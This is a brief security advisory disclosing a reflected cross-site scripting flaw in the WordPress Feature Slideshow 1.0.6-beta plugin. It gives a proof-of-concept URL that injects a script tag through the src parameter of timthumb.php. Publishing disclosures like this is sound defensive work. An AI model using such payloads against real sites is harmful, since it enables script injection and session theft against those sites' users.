Home
Consulting
Advisories
Software
Articles
Contact

WordPress Feature Slideshow 1.0.6-beta Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WordPress Feature Slideshow 1.0.6-beta can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=<script>alert(0)</script>


Copyright © 2018 AutoSec Tools LLC